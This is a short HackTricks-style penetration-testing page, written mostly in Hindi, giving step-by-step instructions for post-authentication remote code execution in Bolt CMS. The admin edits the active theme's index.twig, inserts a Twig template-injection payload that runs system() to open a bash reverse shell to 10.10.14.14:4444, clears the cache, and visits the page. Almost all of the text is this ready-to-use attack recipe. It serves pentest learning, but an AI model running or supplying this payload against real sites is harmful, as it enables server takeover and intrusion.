Bolt CMS
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
व्यवस्थापक के रूप में लॉगिन करने के बाद (लॉगिन प्रॉम्प्ट तक पहुँचने के लिए /bot पर जाएँ), आप Bolt CMS में RCE प्राप्त कर सकते हैं:
Configuration
-> View Configuration
-> Main Configuration
चुनें या URL पथ /bolt/file-edit/config?file=/bolt/config.yaml
पर जाएँ
थीम का मान जांचें
File management
-> View & edit templates
चुनें
पिछले (base-2021
इस मामले में) चरण में पाए गए थीम बेस का चयन करें और index.twig
चुनें
मेरे मामले में यह URL पथ /bolt/file-edit/themes?file=/base-2021/index.twig में है
इस फ़ाइल में template injection (Twig) के माध्यम से अपना पेलोड सेट करें, जैसे: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
और परिवर्तन सहेजें
Maintenance
-> Clear the cache
में कैश साफ़ करें
फिर से एक सामान्य उपयोगकर्ता के रूप में पृष्ठ तक पहुँचें, और पेलोड निष्पादित होना चाहिए
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)